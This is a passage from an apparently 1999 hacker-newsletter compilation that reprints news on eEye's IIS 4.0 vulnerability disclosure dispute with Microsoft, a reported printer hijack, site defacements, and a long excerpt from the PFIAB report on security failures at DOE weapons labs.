Microsoft was "not taking the vulnerability seriously."
When Microsoft still had not publicly acknowledged
the vulnerability six hours after eEye posted the
advisory, the security company went a step further
and published source code that could be used
against the IIS bug. "When it was at that level, we
decided we had to release the exploit, we would
definitely get more attention," said Bushnaq.
For its part, Microsoft was not pleased with eEye’s
decision to issue an advisory, much less any source
code that could be used against their product.
Microsoft deems eEye’s full disclosure decision as
"irresponsible" and "beyond comprehension,"
according to Jason Garms, Microsoft’s lead product
manager for Windows NT security.
The disagreement between Microsoft and eEye
highlights a burgeoning culture clash in the computer
world where traditional corporate secrecy collides
with the free-information ethos of the Net.
On its web site, eEye explained why it felt justified in
posting the advisory and the source code. "Our
responsibility to our clients and the whole network
community is to disclose as many details as
possible.… This is the way we can contribute to the
security community and keep software vendors
working hard at producing more robust products."
For its part, Microsoft hoped that by keeping
knowledge of the vulnerability secret, it could protect
its customers until a patch had been developed and
tested. "Frankly, the feedback from customers is
that they don’t want us to go and publicize our bugs
before we have fixes for our problems," Garns said.
But at least one industry analyst questions
Microsoft’s handling of the situation. "If you want
your customers to depend on your products for
mission-critical applications, then you have to avoid
at all costs any kind of behavior that suggests you’re
not to be trusted and you’re not dependable," said
Eric Hemmendinger, a senior analyst at the
Aberdeen Group. "Having a problem occur is one
thing. But not acknowledging it is another issue
altogether. For that people should hold them
accountable."
Hemmendinger compared Microsoft’s attitude toward
corporate information technology managers with that
of a rude guest. "It’s like an immature person being
invited to the party and not behaving responsibly.
This is not the kind of behavior that gets you invited
back to the party," he said.
The situation could come back to haunt Microsoft as
it tries to attract new corporate customers. "If you
are considering using IIS and you become aware of
things like this in Microsoft's behavior you got to
take this into consideration," Hemmendinger said. "If
they really want to be accepted in the data center
this is not the right behavior."
-=-
UK register;
Posted 18/06/99 12:33pm by John Lettice
Major MS Web Server security hole exposed,
plugged
Security outfit eEye has roused Microsoft's ire and garnered itself some cheap
publicity by going public with information on what it says is a serious security flaw in
Microsoft's Internet Information Server (IIS) 4.0. The move hasn't helped the company's
relationship with Microsoft any, but it seems to have triggered the appearance of a
swift patch, full fix to follow.
According to eEye the flaw allows arbitrary code to be run on any web server running
IIS 4.0, and by using a buffer overflow bug in the software attackers can remotely
execute code to enable access to all data on the server." So it's a serious one,
although Microsoft says it hasn't had any reports of the security hole being used so far.
eEye accuses Microsoft of failing to give the problem the attention it deserved. The
company claims to have hassled MS for days, but "after the fifth day of reporting the
bug to Microsoft, they stopped responding to our emails." So the company went public
with the problem three days later, as an attempt to force Microsoft's hand.
Microsoft swiftly posted a patch, but accuses eEye of irresponsibility in publicising a
problem before a fix had been found. There's some justification in that, but there's also
some in the view that being able to announce "we've found a hole, but we fixed it" is
better than having to confirm "Yike, there's a huge security hole in our product." ®
@HWA
58.0 Has the FBI Overreacted?
~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Scott Peterson has some interesting commentary about
the recent crackdown of the FBI on web graffiti artists.
The government has compared recent cracks to the use
of terrorist weapons such as chemical and biological
weapons. Mr. Peterson says it is nothing of the sort and
that the recent crackdown fosters images of
McCarthyism. Definitely some interesting viewpoints
here and worth the time to read.
PC Week
http://www.zdnet.com/pcweek/stories/news/0,4153,406619,00.html
** Sorry the ZDNet nazis have cut and paste prevention in their html code so I
couldn't reprint the article here.(And you can't either for personal record
wtf kind of lame action is that?). the reason I do reprint the articles is
because often times (see previous section links for examples) the stories are
unavailable or pay only for archives, if anyone knows how to thwart ZDNet's
(or anyone elses) anti cut and paste tactics email me hwa@press.usmc.net! and
no view source doesn't work either ...
59.0 Printer at Spa War Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Silicosis
Ron Broersma, from the Space and Naval Systems
Warfare Center, has claimed that Russians where able
to redirect print jobs destined for a local printer back to
Russia. While such a hack is possible in theory the
difficulties of doing so would make it seem unlikely. DNS
cache corruption seems like the most likely scenario. It
is too bad that Mr. Broersma did not respond to the
authors of this article with confirmation.
CMP Net
http://www.techweb.com/wire/story/TWB19990617S0007
Russians Hack U.S. Printer
(06/17/99, 10:56 a.m. ET)
By Lee Bruno and Robin Gareiss, Data Communications
Welcome back, Cold War. It looks as though
the Russians might be up to their old tricks,
if the infiltration of the network at the Space
and Naval Systems Warfare Center (Spa
War) in San Diego, Calif., is any indication.
The incursion was discovered by Ron Broersma, a Spa
War networkoperations engineer, when a local network
print job took an unusually long time. Monitoring tools
revealed a file had been hijacked from the printing
queue, sent to a server in Russia, and finally back to the
Spa War printer. Broersma concluded the network
intruder had hacked into the printer, and reconfigured
routing tables on equipment elsewhere on the Spa War
network to ship the file to Russia.
Broersma relayed his account of the network printer
hack at a recent meeting of the North American
Network Operators' Group. He said he secured Spa
War's printers after the attack by resetting router filters,
and by eliminating older printers that, he said, are
especially vulnerable.
"It turned out to be a real tough problem for us," he
said.
Broersma has not returned subsequent phone calls for
further comment, however. It's also not known who the
Russian server belonged to, or what information was
compromised.
Networked printers are known to be especially
vulnerable to hacking attacks. They have their own IP
addresses, and they run various standard protocols that
can be exploited. To make matters worse, printer
vendors haven't added any strong security features to
their products that would protect them against
break-ins.
@HWA
60.0 Popular Singapore Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by lamer
Two high profile sites in Singapore where recently
defaced. MediaCity and Television Corporation Of
Singapore. Unfortunately no mirrors of either site are
available.
The Electric New Paper
http://newpaper.asia1.com.sg/spore/nplo05.html
(link dead)
@HWA
61.0 DOD Says its CRAP! (Mustn't be Scottish)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
DOD Labels Software as 'Crap'
contributed by Code Kid
Art Money, senior civilian IT official for the Defense
Department, while speaking at at the GovTechNet
International Conference in Washington, D.C, said "The
quality of software we're getting from vendors today is
crap, vendors are not building quality in."
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-crap-6-17-99.html
JUNE 17, 1999 . . . 15:17 EDT
Contractors' software 'crap,' says top DOD IT
official
BY BOB BREWIN (antenna@fcw.com)
The Pentagon's top information technology official sharply criticized, in the
plainest possible language, the quality of software that IT contractors currently
supply to the Defense Department.
"The quality of software we're getting from vendors today is crap," said Art
Money, senior civilian official, who is acting as assistant secretary of Defense
for command, control, communications and intelligence.
"Vendors are not building quality in," Money said today at the GovTechNet
International Conference in Washington, D.C. "We're finding holes in it."
DOD buys hundreds of millions of dollars worth of software each year,
including everything from shrink-wrapped packages designed to run on the
desktop to customized systems running millions of lines of code.
The quality of much of the software that DOD is receiving is so poor, Money
said, that he is worried about the future of the U.S. software industry. Money
predicted that if the U.S. software industry does not get its act together, it
could suffer the same fate as the U.S. automobile manufacturing industry, with
software sales moving offshore to Japan, for example.
@HWA
62.0 DOE Still Unsecure
~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Space Rogue
Even after one of the worst cases of spying in US
history a special investigative report has found that the
Department of Energy is not taking computer security
seriously. The report labels computer security practices
at DOE as "naive at best and dangerously irresponsible
at worst."
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-report-6-16-99.html
Science at its Best, Security at its Worst - DOE Security Report
http://jya.com/pfiab-doe.htm
Federal Computer Week;
JUNE 16, 1999 . . . 17:24 EDT
Cybersecurity holes persist at DOE labs, study
finds
BY DANIEL VERTON (dan_verton@fcw.com)
Despite what may be the worst spy case in U.S. history involving nuclear
weapon design data, the computer networks at the nation's five weapons
laboratories continue to be "riddled with vulnerabilities," according to a report
by a special investigative panel of intelligence and security officials.
According to the report, "Science at its Best, Security at its Worst," issued this
month by the President's Foreign Intelligence Advisory Board, midlevel
managers throughout the Energy Department have responded to the recent
Chinese spy scandal with a "business as usual" attitude, while foreign nationals
residing in "sensitive countries" continue to have unmonitored remote dial-up
access to lab networks.
The three-month study uncovered recurring problems with DOE's computer
security program, including poor labeling and tracking of computer media,
problems with lax password enforcement on laboratory computer
workstations and a significant failure to control access to sensitive and
classified networks.
Computer security methods throughout DOE over the last two decades have
been "naive at best and dangerously irresponsible at worst," the report said. In
fact, "computer systems at some DOE facilities were so easy to access that
even department analysts likened them to 'automatic teller machines,'
[allowing] unauthorized withdrawals at our nation's expense," the report said.
Security audits also uncovered what the report calls "remarkable" lapses in
addressing security problems and procedural gaps at many DOE labs.
According to the report, it took DOE 31 months to write and approve a
network security plan, 24 months to order security labels for mislabeled
software, 20 months to ensure that improperly stored classified computer
media had been safeguarded and 51 months to properly safeguard
cryptographic material used to secure telephones. It even took 11 months to
remove a deceased employee from classified document access lists, according
to the report.
The report also outlined instances of classified information being placed on
unclassified networks well after the department had developed a corrective
action plan in July 1998. "The predominant attitude toward security and
counterintelligence among many DOE and lab managers has ranged from
half-hearted, grudging accommodation to smug disregard," the report
concluded.
-=-
** A few diagrams were omitted from this report go to the url at jya
fo see the report with diagrams (they're most useful NOT)... - Ed
24 June 1999: Revise links to PFIAB report at the White House.
23 June 1999: Link to DOE Secretary Richardson's June 22 Senate testimony.
22 June 1999: Add notice on Senate joint hearings.
[Congressional Record: June 21, 1999 (Digest)]
From the Congressional Record Online via GPO Access [wais.access.gpo.gov]
Monday, June 21, 1999
Daily Digest
Senate
COMMITTEE MEETINGS FOR TUESDAY,
JUNE 22, 1999
(Committee meetings are open unless otherwise indicated)
Senate
Committee on Armed Services: with the Select Committee on Intelligence,
and with the Committee on Energy and Natural Resources, and with the
Committee on Governmental Affairs, to hold joint hearings on the
President's Foreign Intelligence Advisory Board's report to the
President: Science at its Best; Security at its Worst: A Report on
Security Problems at the U.S. Department of Energy, 9:30 a.m., SD-106.
18 June 1999: Add balance of HTML conversion.
15 June 1999. Thanks to the White House Office of the PFIAB (202) 456-2352.
From: Jane_E._Baker@pfiab.eop.gov
To: jya@jya.com, dellaratta@exchangemonitor.com, jhorowitz@tribune.com,
bullfrog@enteract.com, catpano@nytimes.com, jpcarson@mindspring.com
Date: Tue, 15 Jun 1999 15:34:33 -0400
Subject: PFIAB RPT
See attached file: Report of Presidents Foreign Intelligence Advisory Board, "Science At Its Best, Security At Its Worst: A Report on Security Problems at
the U.S. Department of Energy," June, 1999:
http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf (72 pages; 420K)
See attached file: Unclassified Appendix to PFIAB Report:
http://www.whitehouse.gov/WH/EOP/pfiab/appendix.pdf (34 pages; 191K)
Source: http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf
SCIENCE AT ITS BEST
__________________________
SECURITY AT ITS WORST
A Report on Security Problems at the
U.S. Department of Energy
[Presidential Seal]
____________________________
A Special Investigative Panel
President’s Foreign Intelligence Advisory Board
JUNE 1999
ABSTRACT
On March 18, 1999, President William J. Clinton requested that the President’s Foreign Intelligence Advisory Board (PFIAB) undertake an inquiry and issue a
report on “the security threat at the Department of Energy’s weapons labs and the adequacy of the measures that have been taken to address it.”
Specifically, the President asked the PFIAB to “address the nature of the present counterintelligence security threat, the way in which it has evolved over the last two
decades and the steps we have taken to counter it, as well as to recommend any additional steps that may be needed.” He also asked the PFIAB “to deliver its
completed report to the Congress, and to the fullest extent possible consistent with our national security, release an unclassified version to the public.”
In response, the Honorable Warren B. Rudman, Chairman of PFIAB, appointed board members Ms. Ann Z. Caracristi, Dr. Sidney Drell, and Mr. Stephen
Friedman to form the Special Investigative Panel and obtained detailees from several federal agencies (CIA, DOD, FBI) to augment the work of the PFIAB staff.
Over the past three months, the panel and staff interviewed more than 100 witnesses, reviewed more than 700 documents encompassing thousands of pages, and
conducted onsite research and interviews at five of the Department of Energy’s national laboratories and plants: Livermore, Los Alamos, Oak Ridge, Pantex, and
Sandia.
The panel has produced a report and an appendix of supporting documents, both of which are unclassified to the fullest extent possible. A large volume of classified
material, which was also reviewed and distilled for this report, has been relegated to a second appendix that is available only to authorized recipients. This report
examines:
The 20–year history of security and counterintelligence issues at the DOE national laboratories, with an emphasis on the five labs that focus on
weapons–related research;
The inherent tension between security concerns and scientific freedom at the labs and its effect on the institutional culture and efficacy of the
Department;
The growth and evolution of the foreign intelligence threat to the national labs, particularly in connection with the Foreign Visitor’s Program of the labs;
The implementation and effectiveness of Presidential Decision Directive No. 61, the reforms instituted by Secretary of Energy Bill Richardson, and
other related initiatives; and,
Additional measures that should be taken to improve security and counterintelligence at the labs.
PANEL MEMBERS
The Honorable Warren B. Rudman, Chairman of the President’s Foreign Intelligence Advisory Board. Senator Rudman is a partner in the law firm of Paul,
Weiss, Rifkind, Wharton, and Garrison. From 1980 to 1992, he served in the U.S. Senate, where he was a member of the Select Committee on Intelligence.
Previously, he was Attorney General of New Hampshire.
Ms. Ann Z. Caracristi, board member. Ms. Caracristi, of Washington, DC, is a former Deputy Director of the National Security Agency, where she served in a
variety of senior management positions over a 40–year career. She is currently a member of the DCI/Secretary of Defense Joint Security Commission and recently
chaired a DCI Task Force on intelligence training. She was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community.
Dr. Sidney D. Drell, board member. Dr. Drell, of Stanford, California is an Emeritus Professor of Theoretical Physics and a Senior Fellow at the Hoover
Institution. He has served as a scientific consultant and advisor to several congressional committees, The White House, DOE, DOD, and the CIA. He is a member
of the National Academy of Sciences and a past President of the American Physical Society.
Mr. Stephen Friedman, board member. Mr. Friedman is Chairman of the Board of Trustees of Columbia University and a former Chairman of Goldman, Sachs,
& Co. He was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community and the Jeremiah Panel on the National
Reconnaissance Office.
PFIAB STAFF
Randy W. Deitering, Executive Director
Mark F. Moynihan, Assistant Director
Roosevelt A. Roy, Administrative Officer
Frank W. Fountain, Assistant Director and Counsel
Brendan G. Melley, Assistant Director
Jane E. Baker, Research/Administrative Officer
PFIAB ADJUNCT STAFF
Roy B., Defense Intelligence Agency
Karen DeSpiegelaere, Federal Bureau of Investigation
Jerry L., Central Intelligence Agency
Christine V., Central Intelligence Agency
David W. Swindle, Department of Defense, Naval Criminal Investigative Service
Joseph S. O’Keefe, Department of Defense, Office of the Secretary of Defense
TABEL OF CONTENTS
FOREWORD I-IV
FINDINGS 1
ROOT CAUSES 7
An International Enterprise 7
Big, Byzantine, and Bewildering Bureaucracy 8
Lack of Accountability 10
Culture and Attitudes 11
Changing Times, Changing Missions 12
RECURRING VULNERABILITIES 13
Management and Planning 13
Physical Security 18
Screening and Monitoring Personnel 20
Protection of Classified and Sensitive Information 21
Tracking Nuclear Materials 22
Foreign Visitors’ Program 23
ASSESSMENTS 29
Responsibility 29
Record of the Clinton Team 30
The 1995 “Walk-In” Document 30
W-88 Investigation 31
Damage Assessment 35
PDD-61: Birth and Intent 36
Timeliness of PDD-61 37
Secretary Richardson’s Initiatives 38
Prospects for Reforms 39
Trouble Ahead 40
Back to the Future 41
REORGANIZATION 43
Leadership 43
Restructuring 46
RECOMMENDATIONS 53
ENDNOTES
APPENDIX
Map of DOE Installations
Chronology of Events
Chronology of Reports on DOE
Damage Assessment of China’s Acquisition of U.S. Nuclear Information
Presidential Decision Directive 61
Bibliography
FOREWORD FROM THE SPECIAL INVESTIGATIVE PANEL
For the past two decades, the Department of Energy has embodied science at its best and security of secrets at its worst.
Within DOE are a number of the crown jewels of the world’s government–sponsored scientific research and development organizations. With its record as the
incubator for the work of many talented scientists and engineers—including many Nobel prize winners—DOE has provided the nation with far–reaching advantages.
Its discoveries not only helped the United States to prevail in the Cold War, they undoubtedly will continue to provide both technological benefits and inspiration for
the progress of generations to come. The vitality of its national laboratories is derived to a great extent from their ability to attract talent from the widest possible
pool, and they should continue to capitalize on the expertise of immigrant scientists and engineers. However, we believe that the dysfunctional structure at the heart of
the Department has too often resulted in the mismanagement of security in weapons–related activities and a lack of emphasis on counterintelligence.
DOE was created in 1977 and heralded as the centerpiece of the federal solution to the energy crisis that had stunned the American economy. A vital part of this
new initiative was the Energy Research and Development Administration (ERDA), the legacy agency of the Atomic Energy Commission (AEC) and inheritor of the
national programs to develop safe and reliable nuclear weapons. The concept, at least, was straightforward: take the diverse and dispersed energy research centers
of the nation, bring them under an umbrella organization with other energy–related enterprises, and spark their scientific progress through closer contacts and
centralized management.
__________________________________
At the birth of DOE, the brilliant
scientific breakthroughs of the nuclear
weapons laboratories came with a troubling
record of security administration.
Twenty years later, virtually every one
of its original problems persists.
However, the brilliant scientific breakthroughs at the nuclear weapons laboratories came with a very troubling record of security administration. For example,
classified documents detailing the designs of the most advanced nuclear weapons were found on library shelves accessible to the public at the Los Alamos
laboratory. Employees and researchers were receiving little, if any, training or instruction regarding espionage threats. Multiple chains of command and standards of
performance negated accountability, resulting in pervasive inefficiency, confusion, and mistrust. Competition among laboratories for contracts, and among researchers
for talent, resources, and support distracted management from security issues. Fiscal management was bedeviled by sloppy accounting. Inexact tracking of the
quantities and flows of nuclear materials was a persistent worry. Geographic decentralization fractured policy implementation and changes in leadership regularly
depleted the small reservoirs of institutional memory. Permeating all of these issues was a prevailing cultural attitude among some in the DOE scientific community
that regarded the protection of nuclear know–how with either fatalism or naiveté.
Twenty years later, every one of these problems still existed. Most still exist today.
__________________________________
The panel found a department saturated
with cynicism, an arrogant disregard
for authority, and a staggering pattern
of denial.
In response to these problems, the Department has been the subject of a nearly unbroken history of dire warnings and attempted but aborted reforms. A cursory
review of the open-source literature on the DOE record of management presents an abysmal picture. Second only to its world–class intellectual feats has been its
ability to fend off systemic change. Over the last dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. No
President, Energy Secretary, or Congress has been able to stem the recurrence of fundamental problems. All have been thwarted time after time by the intransigence
of this institution. The Special Investigative Panel found a large organization saturated with cynicism, an arrogant disregard for authority, and a staggering pattern of
denial. For instance, even after President Clinton issued Presidential Decision Directive 61 ordering that the Department make fundamental changes in security
procedures, compliance by Department bureaucrats was grudging and belated.
Time after time over the past few decades, officials at DOE headquarters and the weapons labs themselves have been presented with overwhelming evidence that
their lackadaisical oversight could lead to an increase in the nuclear threat against the United States. Throughout its history, the Department has been the subject of
scores of critical reports from the General Accounting Office (GAO), the intelligence community, independent commissions, private management consultants, its
Inspector General, and its own security experts. It has repeatedly attempted reforms. Yet the Department’s ingrained behavior and values have caused it to continue
to falter and fail.
PROSPECTS FOR REFORMS
We believe that Secretary of Energy Richardson, in attempting to deal with many critical security matters facing the Department, is on the right track in some, though
not all, of his changes. We concur with and encourage many of his recent initiatives, and we are heartened by his aggressive approach and command of the issues.
But we believe that he has overstated the case when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are,
today, safe and secure.”
After a review of more than 700 reports and studies, thousands of pages of classified and unclassified source documents, interviews with scores of senior federal
officials, and visits to several of the DOE laboratories at the heart of this inquiry, the Special Investigative Panel has concluded the Department of Energy is incapable
of reforming itself—bureaucratically and culturally—in a lasting way, even under an activist Secretary.
The panel has found that DOE and the weapons laboratories have a deeply rooted culture of low regard for and, at times, hostility to security issues, which has
continually frustrated the efforts of its internal and external critics, notably the GAO and the House Energy and Commerce Committee. Therefore, a reshuffling of
offices and lines of accountability may be a necessary step toward meaningful reform, but it almost certainly will not be sufficient.
Even if every aspect of the ongoing structural reforms is fully implemented, the most powerful guarantor of security at the nation’s weapons laboratories will not be
laws, regulations, or management charts. It will be the attitudes and behavior of the men and women who are responsible for the operation of the labs each day.
These will not change overnight, and they are likely to change only in a different cultural environment—one that values security as a vital and integral part of
day–to–day activities and believes it can coexist with great science.
We are convinced that when Secretary Richardson vacates the office his successor is not likely to have a comparable appreciation of the gravity of the Department’s
past problems, nor a comparable interest in resolving them. The next Secretary of Energy will not have spent months at the tip of the sword created by the recent
public outcry over DOE mismanagement of national secrets. Indeed, the core of the Department’s bureaucracy is quite capable of undoing Secretary Richardson’s
reforms, and may well be inclined to do so if given the opportunity.
Ultimately, the nature of the institution and the structure of the incentives under a culture of scientific research require great attention if they are to be made compatible
with the levels of security and the degree of command–and–control warranted where the research and stewardship of nuclear weaponry is concerned. Yet it must be
done.
THE PFIAB INQUIRY
The PFIAB panel is fully aware of the many recent allegations of management failures surrounding the Department of Energy and questions about the subsequent
roles of entities such as the Department of Justice, the Federal Bureau of Investigation, and the Central Intelligence Agency. Much of the research we conducted has
relevance to these allegations. However, the depth and the complexity of the issues call for examinations by institutions with greater resources and a wider charter:
namely, Congress and standing executive agencies of the federal government.
In the 90 days of our inquiry, the PFIAB panel conducted numerous interviews with senior federal officials who agreed to speak candidly—with the understanding
that they would not be identified by name—about DOE’s problems and recent events. On balance, the panel finds that some very damaging security compromises
may have occurred, as alleged by some in recent weeks. But we believe that in matters of intelligence and counterintelligence, one cannot brush off the reality that
conclusions are often intrinsically based on probabilities, rather than certainties.
Leaders, of course, are often obliged to act, and should act, based on the probability of impending danger, not only its certainty. And those entrusted with the public
weal are indisputably served better by having more information about risks than less. So the panel would like to note the contributions of those who have helped to
raise the public’s awareness of the risks to national security posed by problems at DOE. Although we do not concur with all of their conclusions, we believe that
both intelligence officials at the Department of Energy and the members of the Cox Committee made substantial and constructive contributions to understanding and
resolving security problems at DOE. As we note later in this report, we concur on balance with the damage assessment of espionage losses conducted by the
Director of Central Intelligence. We also concur with the findings of the independent review of that assessment by Admiral David Jeremiah and his panel.
Our mandate from President Clinton was restricted to an analysis of the structural and management problems in the Department’s security and counterintelligence
operations. We abided by that. We also recognize the unique nature of the assignment given to us by the President. Never before in its history of more than 35 years
has the PFIAB prepared a report for release to the general public. As a result, we have taken pains to ensure that the language of this report is “plain English,” not
bureaucratese, and that the findings of the report are stated directly and candidly, not with the indirection and euphemisms often employed by policy insiders.
SOLUTIONS
Our panel has concluded that the Department of Energy, when faced with a profound public responsibility, has failed. Therefore, this report suggests two alternative
organizational solutions, both of which we believe would substantially insulate the weapons laboratories from many of DOE’s historical problems and promote the
building of a responsible culture over time. We also offer recommendations for improving various aspects of security and counterintelligence at DOE, such as
personnel assurance, cyber–security, program management, and interdepartmental cooperation under the Foreign Intelligence Surveillance Act of 1978.
The weapons research and stockpile management functions should be placed wholly within a new semi–autonomous agency within DOE that has a clear mission,
streamlined bureaucracy, and drastically simplified lines of authority and accountability. Useful lessons along these lines can be taken from the National Security
Agency (NSA) or Defense Advanced Research Projects Agency (DARPA) within the Department of Defense or the National Oceanographic and Atmospheric
Administration (NOAA) within the Department of Commerce. The other alternative is a wholly independent agency, such as the National Aeronautics and Space
Administration (NASA). There was substantial debate among the members of the panel about these two alternatives. Both have strengths and weaknesses. In the
final analysis, the decision rests in the hands of the President and the Congress, and we trust that they will give serious deliberation to the merits and shortcomings of
the alternatives before enacting major reforms. We all agree, nonetheless, that the labs should never be subordinated to the Department of Defense.
With either proposal it will be important for the weapons labs to maintain effective scientific contact on nonclassified scientific research with the other DOE labs and
the wider scientific community. To do otherwise would work to the detriment of the nation’s scientific progress and security over the long run. This argument draws
on history: nations that honor and advance freedom of inquiry have fared better than those who have sought to arbitrarily suppress and control the community of
science.
__________________________________
The nuclear weapons and research
functions of DOE need more autonomy,
a clearer mission, a streamlined bureaucracy,
and increased accountability.
However, we would submit that we do not face an either/or proposition. The past 20 years have provided a controlled experiment of a sort, the results of which
point to institutional models that hold promise. Organizations such as NASA and DARPA have advanced scientific and technological progress while maintaining a
respectable record of security. Meanwhile, the Department of Energy, with its decentralized structure, confusing matrix of cross–cutting and overlapping
management, and shoddy record of accountability has advanced scientific and technological progress, but at the cost of an abominable record of security with deeply
troubling threats to American national security.
Thomas Paine once said that “government, even in its best state, is but a necessary evil; in its worst state, an intolerable one.” This report finds that DOE’s
performance, throughout its history, should have been regarded as intolerable.
We believe the results and implications of this experiment are clear. It is time for the nation’s leaders to act decisively in the defense of America’s national security.
Warren Rudman
Chairman of the President’s Foreign
Intelligence Advisory Board
Ms. Ann Caracristi
Board Member
Dr. Sidney Drell
Board Member
Mr. Stephen Friedman
Board Member
FINDINGS
On March 18, 1999, President Clinton tasked the Foreign Intelligence Advisory Board to review the history of the security and counterintelligence threats to the
nation’s weapons labs and the effectiveness of the responses by the U.S. government. He also asked the Board to propose further improvements.
This report, based on reviews of hundreds of source documents and studies, analysis of intelligence reports, and scores of interviews with senior level officials from
several administrations, was prepared over the past 90 days in fulfillment of the President’s request.
BOTTOM LINE
Our bottom line: DOE represents the best of America’s scientific talent and achievement, but it has also been responsible for the worst security record on secrecy
that the members of this panel have ever encountered.
The national labs of the Department of Energy are among the crown jewels of the world’s government–sponsored scientific research and development organizations.
With its record as the incubator for the work of many talented scientists and engineers—including many Nobel prize winners—it has provided the nation with
far–reaching advantages. Its discoveries not only helped the United States to prevail in the Cold War, they will undoubtedly provide both technological benefits and
inspiration for the progress of generations to come. Its vibrancy is derived to a great extent from its ability to attract talent from the widest possible pool, and it
should continue to capitalize on the expertise of immigrant scientists and engineers. However, the Department has devoted far too little time, attention, and resources
to the prosaic but grave responsibilities of security and counterintelligence in managing its weapons and other national security programs.
FINDINGS
The preponderance of evidence accumulated by the Special Investigative Panel, spanning the past 25 years, has compelled the members to reach many definite
conclusions—some very disturbing—about the security and well–being of the nation’s weapons laboratories.
As the repository of America’s most advanced know-how in nuclear and related armaments and the home of some of America’s finest scientific
minds, these labs have been and will continue to be a major target of foreign intelligence services, friendly as well as hostile. Two landmark events, the
end of the Cold War and the overwhelming victory of the United States and its allies in the Persian Gulf War, markedly altered the security equations and outlooks of
nations throughout the world. Friends and foes of the United States intensified their efforts to close the technological gap between their forces and those of America,
and some redoubled their efforts in the race for weapons of mass destruction. Under the restraints imposed by the Comprehensive Test Ban Treaty, powerful
computers have replaced detonations as the best available means of testing the viability and performance capabilities of new nuclear weapons. So research done by
U.S. weapons laboratories with high performance computers stands particularly high on the espionage hit list of other nations, many of which have used increasingly
more sophisticated and diverse means to obtain the secrets necessary to join the nuclear club.
______________________________________
Snapshot: DOE Weapons Operations
Percentage of Budget: Roughly $6 billion, a
third of the Department’s $18 billion FY99 budget.
Allocation of Weapons-Related Budget:
Defense Programs $4.4 billion
Nonproliferation/Nat. Sec. 0.7
Fissile Material Disposal 0.2
Naval Reactors 0.7
Number of Contract Employees: 34,190
Number of Contract Employees Per Lab
Los Alamos 6,900
Sandia 7,500
L. Livermore 6,400
Pantex 2,860
Oak Ridge (Y-12) 5,500
Kansas City 3,150
Nevada Test Site 1,880
SOURCE: DEPT. OF ENERGY FIELD FACTBOOK, MAY 1998
More than 25 years worth of reports, studies and formal inquiries—by executive branch agencies, Congress, independent panels, and even DOE
itself—have identified a multitude of chronic security and counterintelligence problems at all of the weapons labs (See Appendix). These reviews
produced scores of stern, almost pleading, entreaties for change. Critical security flaws—in management and planning, personnel assurance, some physical security
areas, control of nuclear materials, protection of documents and computerized information, and counterintelligence—have been cited for immediate attention and
resolution … over and over and over … ad nauseam.
The open–source information alone on the weapons laboratories overwhelmingly supports a troubling conclusion: their security and
counterintelligence operations have been seriously hobbled and relegated to low-priority status for decades. The candid, closed–door testimony of
current and former federal officials as well as the content of voluminous classified materials received by this panel in recent weeks reinforce this conclusion. When it
comes to a genuine understanding of and appreciation for the value of security and counterintelligence programs, especially in the context of America’s nuclear
arsenal and secrets, the DOE and its weapons labs have been Pollyannaish. The predominant attitude toward security and counterintelligence among many DOE and
lab managers has ranged from half–hearted, grudging accommodation to smug disregard. Thus the panel is convinced that the potential for major leaks and thefts of
sensitive information and material has been substantial. Moreover, such security lapses would have occurred in bureaucratic environments that would have allowed
them to go undetected with relative ease.
Organizational disarray, managerial neglect, and a culture of arrogance—both at DOE headquarters and the labs themselves—conspired to create
an espionage scandal waiting to happen. The physical security efforts of the weapons labs (often called the “guns, guards, and gates”) have had some isolated
shortcomings, but on balance they have developed some of the most advanced security technology in the world. However, perpetually weak systems of personnel
assurance, information security, and counterintelligence have invited attack by foreign intelligence services. Among the defects this panel found:
Inefficient personnel clearance programs, wherein haphazard background investigations could take years to complete and the backlogs numbered in the
tens of thousands.
Loosely controlled and casually monitored programs for thousands of unauthorized foreign scientists and assignees—despite more than a decade of
critical reports from the General Accounting Office, the DOE Inspector General, and the intelligence community.
This practice occasionally created bizarre circumstances in which regular lab employees with security clearances were supervised by foreign nationals
on temporary assignment.
Feckless systems for control of classified documents, which periodically resulted in thousands of documents being declared lost.
Counterintelligence programs with part–time CI officers, who often operated with little experience, minimal budgets, and employed little more than
crude “awareness” briefings of foreign threats and perfunctory and sporadic debriefings of scientists travelling to foreign countries.
A lab security management reporting system that led everywhere but to responsible authority.
Computer security methods that were naive at best and dangerously irresponsible at worst.
Why were these problems so blatantly and repeatedly ignored? DOE has had a dysfunctional management structure and culture that only occasionally gave proper
credence to the need for rigorous security and counterintelligence programs at the weapons labs. For starters, there has been a persisting lack of real leadership and
effective management at DOE.
The nature of the intelligence–gathering methods used by the People’s Republic of China poses a special challenge to the U.S. in general and the
weapons labs in particular. More sophisticated than some of the blatant methods employed by the former Soviet bloc espionage services, PRC intelligence
operatives know their strong suits and play them extremely well. Increasingly more nimble, discreet and transparent in their spying methods, the Chinese services
have become very proficient in the art of seemingly innocuous elicitations of information. This modus operandi has proved very effective against unwitting and
ill–prepared DOE personnel.
Despite widely publicized assertions of wholesale losses of nuclear weapons technology from specific laboratories to particular nations, the factual
record in the majority of cases regarding the DOE weapons laboratories supports plausible inferences—but not irrefutable proof—about the source
and scope of espionage and the channels through which recipient nations received information. The panel was not charged, nor was it empowered, to
conduct a technical assessment regarding the extent to which alleged losses at the national weapons laboratories may have directly advanced the weapons
development programs of other nations. However, the panel did find these allegations to be germane to issues regarding the structure and effectiveness of DOE
security programs, particularly the counterintelligence functions.
The classified and unclassified evidence available to the panel, while pointing out systemic security vulnerabilities, falls short of being conclusive. The actual damage
